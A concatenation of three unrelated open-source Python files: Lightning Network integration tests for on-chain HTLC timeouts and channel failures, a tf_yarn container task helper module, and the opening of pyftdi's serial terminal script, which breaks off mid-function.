r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l2.daemon.wait_for_log('openingd-{} chan #1: Handed peer, entering loop'.format(l1.info['id']))
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Check that the all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = txout['scriptPubKey']['addresses'][0]
assert(addr == o['address'])
addr = l1.bitcoin.rpc.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
|
_task_commons.py | import json
import logging
import os
import re
import sys
from typing import List, Tuple, Dict, Optional
import cloudpickle
import skein
import tensorflow as tf
from tf_yarn import event, cluster, Experiment, constants
from tf_yarn._internal import MonitoredThread, iter_tasks
_logger = logging.getLogger(__name__)
def _log_sys_info() -> None:
_logger.info(f"Python {sys.version}")
_logger.info(f"Skein {skein.__version__}")
_logger.info(f"TensorFlow {tf.version.GIT_VERSION} {tf.version.VERSION}")
def _setup_container_logs(client):
task = cluster.get_task()
event.broadcast_container_start_time(client, task)
container = next(c for c in client.get_containers()
if c.yarn_container_id == os.environ["CONTAINER_ID"])
logs = container.yarn_container_logs
if logs is not None and not logs.startswith("http://"):
logs = "http://" + logs
event.logs_event(client, task, logs)
def _prepare_container(
host_port: Tuple[str, int]
) -> Tuple[skein.ApplicationClient, Dict[str, List[str]], List[str]]:
"""Keep socket open while preparing container """
client = skein.ApplicationClient.from_current()
_setup_container_logs(client)
cluster_tasks = _get_cluster_tasks(client)
cluster_spec = cluster.start_cluster(host_port, client, cluster_tasks)
return client, cluster_spec, cluster_tasks
def _get_cluster_tasks(
client: skein.ApplicationClient
) -> List[str]:
return list(iter_tasks(json.loads(client.kv.wait(constants.KV_CLUSTER_INSTANCES).decode())))
def _get_experiment(
client: skein.ApplicationClient
) -> Experiment:
try:
experiment = cloudpickle.loads(client.kv.wait(constants.KV_EXPERIMENT_FN))()
except Exception as e:
task = cluster.get_task()
event.start_event(client, task)
event.stop_event(client, task, e)
raise
return experiment
def _gen_monitored_train_and_evaluate(client: skein.ApplicationClient):
task = cluster.get_task()
def train_and_evaluate(
estimator: tf.estimator,
train_spec: tf.estimator.TrainSpec,
eval_spec: tf.estimator.EvalSpec):
event.broadcast_train_eval_start_timer(client, task)
tf.estimator.train_and_evaluate(
estimator,
train_spec,
eval_spec
)
event.broadcast_train_eval_stop_timer(client, task)
return train_and_evaluate
def _execute_dispatched_function(
client: skein.ApplicationClient,
experiment: Experiment
) -> MonitoredThread:
task_type, task_id = cluster.get_task_description()
_logger.info(f"Starting execution {task_type}:{task_id}")
thread = MonitoredThread(
name=f"{task_type}:{task_id}",
target=_gen_monitored_train_and_evaluate(client),
args=tuple(experiment),
daemon=True)
thread.start()
task = cluster.get_task()
event.start_event(client, task)
return thread
def matches_device_filters(task: str, device_filters: List[str]):
task_type, task_id = task.split(":", 1)
for device_filter in device_filters:
[(filter_type, filter_id)] = re.findall(
r"^/job:([a-z]+)(?:/task:(\d+))?$",
# Remove once https://github.com/tensorflow/tensorflow/pull/22566 is released
device_filter.replace("master", "chief"))
if (filter_type == task_type and
(not filter_id or filter_id == task_id)):
return True
return not device_filters
def wait_for_connected_tasks(client, all_tasks, device_filters, message='stop'):
for task in all_tasks:
if matches_device_filters(task, device_filters):
event.wait(client, f"{task}/{message}")
def _shutdown_container(
client: skein.ApplicationClient,
cluster_tasks: List[str],
run_config: tf.estimator.RunConfig,
thread: Optional[MonitoredThread]
) -> None:
# Wait for all tasks connected to this one. The set of tasks to
# wait for contains all tasks in the cluster, or the ones
# matching ``device_filters`` if set. The implementation assumes
# that ``device_filers`` are symmetric.
exception = thread.exception if thread is not None and isinstance(thread, MonitoredThread) \
else None
task = cluster.get_task()
event.stop_event(client, task, exception)
wait_for_connected_tasks(
client,
cluster_tasks,
getattr(run_config.session_config, "device_filters", []))
event.broadcast_container_stop_time(client, task)
if exception is not None:
raise exception from None
|
pyterm.py | #!/usr/bin/env python3
"""Simple Python serial terminal
"""
# Copyright (c) 2010-2020, Emmanuel Blot <emmanuel.blot@free.fr>
# Copyright (c) 2016, Emmanuel Bouaziz <ebouaziz@free.fr>
# All rights reserved.
#
# SPDX-License-Identifier: BSD-3-Clause
#pylint: disable-msg=too-many-instance-attributes
#pylint: disable-msg=too-many-arguments
#pylint: disable-msg=too-many-nested-blocks
#pylint: disable-msg=too-many-branches
#pylint: disable-msg=too-many-statements
#pylint: disable-msg=too-few-public-methods
#pylint: disable-msg=broad-except
#pylint: disable-msg=wrong-import-position
from argparse import ArgumentParser, FileType
from atexit import register
from collections import deque
from logging import Formatter, StreamHandler, DEBUG, ERROR
from os import environ, linesep, stat
from sys import exit as sysexit, modules, platform, stderr, stdout
from time import sleep
from threading import Event, Thread
from traceback import format_exc
from _thread import interrupt_main
#pylint: disable-msg=import-error
#pylint: disable-msg=import-outside-toplevel
from pyftdi import FtdiLogger
from pyftdi.ftdi import Ftdi
from pyftdi.misc import to_bps, add_custom_devices
from pyftdi.term import Terminal
class MiniTerm:
"""A mini serial terminal to demonstrate pyserial extensions"""
DEFAULT_BAUDRATE = 115200
def __init__(self, device, baudrate=None, parity=None, rtscts=False,
debug=False):
self._terminal = Terminal()
self._device = device
self._baudrate = baudrate or self.DEFAULT_BAUDRATE
self._port = self._open_port(self._device, self._baudrate, parity,
rtscts, debug)
self._resume = False
self._silent = False
self._rxq = deque()
self._rxe = Event()
self._debug = debug
register(self._cleanup)
def run(self, fullmode=False, loopback=False, silent=False,
localecho=False, autocr=False):
"""Switch to a pure serial terminal application"""
self._terminal.init(fullmode)
print('Entering minicom mode @ %d bps' % self._port.baudrate)
stdout.flush()
self._resume = True
# start the reader (target to host direction) within a dedicated thread
args = [loopback]
if self._device.startswith('ftdi://'):
# with pyftdi/pyusb/libusb stack, there is no kernel buffering
# which means that a UART source with data burst may overflow the
# FTDI HW buffer while the SW stack is dealing with formatting
# and console output. Use an intermediate thread to pop out data
# out from the HW as soon as it is made available, and use a deque
# to serve the actual reader thread
args.append(self._get_from_source)
sourcer = Thread(target=self._sourcer)
sourcer.setDaemon(1)
sourcer.start()
else:
# regular kernel buffered device
args.append(self._get_from_port)
reader = Thread(target=self._reader, args=tuple(args))
reader.setDaemon(1)
reader.start()
# start the writer (host to target direction)
self._writer(fullmode, silent, localecho, autocr)
def _sourcer(self):
try:
while self._resume:
data = self._port.read(4096)
if not data:
continue
self._rxq.append(data)
self._rxe.set()
except Exception as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
def _get_from_source(self):
while not self._rxq and self._resume:
if self._rxe.wait(0.1):
self._rxe.clear()
break
if not self._rxq:
return bytearray()
return self._rxq.popleft()
def _get_from_port(self):
try:
return self._port.read(4096)
except OSError as ex:
self._resume = False
print(str(ex), file=stderr)
interrupt_main()
except Exception as ex:
print(str(ex), file=stderr)
return bytearray()
def _reader(self, loopback, getfunc):
"""Loop forever, processing received serial data in terminal mode"""
try:
# Try to read as many bytes as possible at once, and use a short
# timeout to avoid blocking for more data
self._port.timeout = 0.050
while self._resume:
if self._silent:
sleep(0.25)
continue
data = getfunc()
if data:
stdout.write(data.decode('utf8', errors='replace'))
stdout.flush()
if loopback:
self._port.write(data)
except KeyboardInterrupt:
return
except Exception as exc:
print("Exception: %s" % exc)
if self._debug:
print(format_exc(chain=False), file=stderr)
interrupt_main()
def _writer(self, fullmode, silent, localecho, crlf=0):
"""Loop and copy console->serial until EOF character is found"""
while self._resume:
try:
char = self._terminal.getkey()
if fullmode and ord(char) == 0x2: # Ctrl+B
self._cleanup(True)
return
if self._terminal.IS_MSWIN:
if ord(char) in (0, 224):
char = self._terminal.getkey()
self._port.write(self._terminal.getch_to_escape(char))
continue
if ord(char) == 0x3: # Ctrl+C
raise KeyboardInterrupt('Ctrl-C break')
if silent:
if ord(char) == 0x6: # Ctrl+F
self._silent = True
print('Silent\n')
continue
if ord(char) == 0x7: # Ctrl+G
self._silent = False
print('Reg\n')
continue
if localecho:
stdout.write(char.decode('utf8', errors='replace'))
stdout.flush()
if crlf:
if char == b'\n':
self._port.write(b'\r')
if crlf > 1:
continue
self._port.write(char)
except KeyError:
continue
except KeyboardInterrupt:
if fullmode:
if self._terminal.IS_MSWIN:
self._port.write(b'\x03')
continue
self._cleanup(True)
def _cleanup(self, *args):
"""Cleanup resource before exiting"""
if args and args[0]:
print('%sAborting...' % linesep)
try:
self._resume = False
if self._port:
# wait till the other thread completes
sleep(0.5)
try:
rem = self._port.inWaiting()
except IOError:
# maybe a bug in underlying wrapper...
rem = 0
# consumes all the received bytes
for _ in range(rem):
self._port.read()
self._port.close()
self._port = None
print('Bye.')
except Exception as ex:
print(str(ex), file=stderr)
finally:
if self._terminal:
self._terminal.reset()
self._terminal = None
@staticmethod
def _open_port(device, baudrate, parity, rtscts, debug=False):
"""Open the serial communication port"""
try:
from serial.serialutil import SerialException
from serial import PARITY_NONE
except ImportError as exc:
raise ImportError("Python serial module not installed") from exc
try:
from serial import serial_for_url, VERSION as serialver
version = tuple([int(x) for x in serialver.split('.')])
if version < (3, 0):
raise ValueError
except (ValueError, IndexError, ImportError) as exc:
raise ImportError("pyserial 3.0+ is required") from exc
# the following import enables serial protocol extensions
if device.startswith('ftdi:'):
try:
from pyftdi import serialext
serialext.touch()
except ImportError as exc:
raise ImportError("PyFTDI module not installed") from exc
try:
port = serial_for_url(device,
baudrate=baudrate,
parity=parity or PARITY_NONE,
rtscts=rtscts,
timeout=0)
if not port.is_open:
port.open()
if not port.is_open:
raise IOError('Cannot open port "%s"' % device)
if debug:
backend = port.BACKEND if hasattr(port, 'BACKEND') else '?'
print("Using serial backend '%s'" % backend)
return port
except SerialException as exc:
raise IOError(str(exc)) from exc
def get_default_device() -> str:
"""Return the default comm device, depending on the host/OS."""
envdev = environ.get('FTDI_DEVICE', '')
if envdev:
return envdev
if platform == 'win32':
device = 'COM1'
elif platform == 'darwin':
device = '/dev/cu.usbserial'
elif platform == 'linux':
device = '/dev/ttyS0'
else:
device = ''
try:
stat(device)
except OSError:
device = 'ftdi:///1'
return device
def main():
"""Main routine"""
debug = False
try:
default_device = get_default_device()
argparser = ArgumentParser(description=modules[__name__].__doc__)
argparser.add_argument('-f', '--fullmode', dest='fullmode',
action='store_true',
help='use full terminal mode, exit with '
'[Ctrl]+B')
argparser.add_argument('device', nargs='?', default=default_device,
help='serial port device name (default: %s)' %
default_device)
argparser.add_argument('-b', '--baudrate',
help='serial port baudrate (default: %d)' %
MiniTerm.DEFAULT_BAUDRATE,
default='%s' % MiniTerm.DEFAULT_BAUDRATE)
argparser.add_argument('-w', '--hwflow',
action='store_true',
help='hardware flow control')
argparser.add_argument('-e', '--localecho',
action='store_true',
help='local echo mode (print all typed chars)')
argparser.add_argument('-r', '--crlf',
action='count', default=0,
help='prefix LF with CR char, use twice to '
'replace all LF with CR chars')
argparser.add_argument('-l', '--loopback',
action='store_true',
help='loopback mode (send back all received '
'chars)')
argparser.add_argument('-s', '--silent', action='store_true',
help='silent mode')
argparser.add_argument('-P', '--vidpid', action='append',
help='specify a custom VID:PID device ID, '
'may be repeated')
argparser.add_argument('-V', '--virtual', type=FileType('r'),
help='use a virtual device, specified as YaML')
argparser.add_argument('-v', '--verbose', action='count',
help='increase verbosity')
argparser.add_argument('-d', '--debug', action='store_true',
help='enable debug mode')
args = argparser.parse_args()
debug = args.debug
if not args.device:
argparser.error('Serial device not specified')
loglevel = max(DEBUG, ERROR - (10 * (args.verbose or 0)))
loglevel = min(ERROR, loglevel)
if debug:
